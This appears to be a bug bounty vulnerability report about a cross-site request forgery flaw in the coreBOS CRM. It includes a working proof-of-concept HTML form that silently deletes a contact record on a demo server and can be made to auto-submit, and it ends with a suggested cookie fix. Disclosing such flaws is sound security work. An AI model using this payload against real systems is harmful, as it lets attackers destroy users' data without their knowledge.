Cross-Site Request Forgery (CSRF) in tsolucio/corebos
Reported on
Aug 5th 2021
✍️ Description
Attacker able to delete any contact with CSRF attack because there is any CSRF protection for related endpoint.
It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.
In CSRF attacks it is necessary that a user logged into your application just going to a malicious website and after that only with a redirection attacker can delete a contact, this means only with visiting a site a contact will be deleted.
🕵️♂️ Proof of Concept
1.fisrt user already should be logged in browser.
2.Open the PoC.html and click on submit button ( Also it can be auto-submit)
3.Here contact with record id 43776
will be deleted after clicking on submit button on PoC.html file.
// PoC.html
<html>
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.corebos.com/index.php">
<input type="hidden" name="__vt5rftk" value="" />
<input type="hidden" name="allselectedboxes" value="" />
<input type="hidden" name="from_link" value="DetailView" />
<input type="hidden" name="cbfromid" value="43776" />
<input type="hidden" name="module" value="Contacts" />
<input type="hidden" name="record" value="43776" />
<input type="hidden" name="isDuplicate" value="false" />
<input type="hidden" name="action" value="Delete" />
<input type="hidden" name="return_module" value="Contacts" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="index" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="opportunity_id" value="" />
<input type="hidden" name="parent_id" value="43776" />
<input type="hidden" name="contact_role" value="" />
<input type="hidden" name="task_id" value="" />
<input type="hidden" name="meeting_id" value="" />
<input type="hidden" name="call_id" value="" />
<input type="hidden" name="case_id" value="" />
<input type="hidden" name="new_reports_to_id" value="" />
<input type="hidden" name="email_directing_module" value="" />
<input type="hidden" name="emailids" value="43776@80|" />
<input type="hidden" name="pmodule" value="Contacts" />
<input type="hidden" name="cbcustominfo1" value="" />
<input type="hidden" name="cbcustominfo2" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Also for real attacks the submit button can be auto-submit.
💥 Impact
This vulnerability is capable of delete any contact.
Fix
Set SameSite attribute of cookies to Strict
.
📍 Location
index.php#L1